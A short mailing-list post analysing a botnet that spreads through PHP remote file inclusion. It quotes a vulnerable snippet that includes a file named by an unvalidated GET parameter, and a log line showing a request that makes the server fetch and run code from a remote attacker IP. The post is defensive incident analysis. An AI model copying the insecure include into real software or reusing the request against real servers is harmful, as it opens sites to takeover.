Destructive botnet originating from Japan

• Previous message (by thread): Destructive botnet originating from Japan
• Next message (by thread): Destructive botnet originating from Japan
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Well it appears that bad code always seems to be the root of  
problems, according to our research today the problem appears to be  
caused by incorrectly written PHP applications that perform includes  
using a string without running any validation against the string:

index.php?test=test
$test=$_GET[test];
include("$test.php");

When the include executes the test string passed from the GET  
includes execution instructions:

       "GET /index.php?test=http%3A//210.170.60.2/....? HTTP/1.0" 200  
8010 "-" "Wget/1.6"

It appears that the attacker at 210.170.60.2 (also the botnet hosting  
IRC server) is spreading his code as the include is called, pulling  
and executing PHP code from a remote server that injects the software.

I'm not sure if this needs to be alerted to anyone outside of this  
list, but it's pretty nasty.


-Barrett

• Previous message (by thread): Destructive botnet originating from Japan
• Next message (by thread): Destructive botnet originating from Japan
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]